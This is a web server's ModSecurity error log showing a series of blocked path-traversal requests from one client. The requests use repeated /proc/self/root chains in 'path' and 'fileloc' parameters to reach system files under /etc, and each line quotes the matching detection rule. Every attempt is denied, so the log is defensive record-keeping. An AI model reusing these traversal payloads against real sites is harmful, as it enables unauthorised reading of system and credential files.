[Mon Mar 16 10:26:53.926990 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:33192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFHbABkC4fWIHEf8Hd9AAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:26:55.206946 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:47240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFH46lpbStxTqkSktglgAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:26:56.527772 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:47256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFIBXjF1vJNtV6CWrsPAAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:26:57.738344 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:47262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFIXbQATo66fKoS7xARAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:26:58.919774 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:47274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFIglT9VtDQc7bgUyfgAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:00.072505 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:57428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFJHjZBu2q05ozVU9IMAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:01.240299 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:57442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFJXbQATo66fKoS7xARgAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:22.814632 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:57458] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFOtSswJuvopo3lOhS6wAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:25.223498 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:53692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFPZqj1wV0Si-OkefcwgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:26.524946 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:53704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFPhXjF1vJNtV6CWrsSQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:27.739847 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:53712] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFPxXjF1vJNtV6CWrsSgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:30.325034 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:53722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFQAlT9VtDQc7bgUyfhQAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:31.699028 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:60494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFQxXjF1vJNtV6CWrsTAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:32.822202 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:60502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFRI6lpbStxTqkSktgngAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:34.095234 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.243.203:60518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFRglT9VtDQc7bgUyfhgAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:35.294005 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:60528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFR7ysWC90G-1nBrA4FQAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:36.431361 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:60530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFSNSswJuvopo3lOhS7QAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:37.720505 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:60540] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFSZqj1wV0Si-OkefcyAAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:41.385261 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:60546] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFTf9ocpUE4ed4uDzgTQAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:42.729670 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:52720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFTnbQATo66fKoS7xAUwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:27:43.948351 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:52734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFT3jZBu2q05ozVU9IQwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
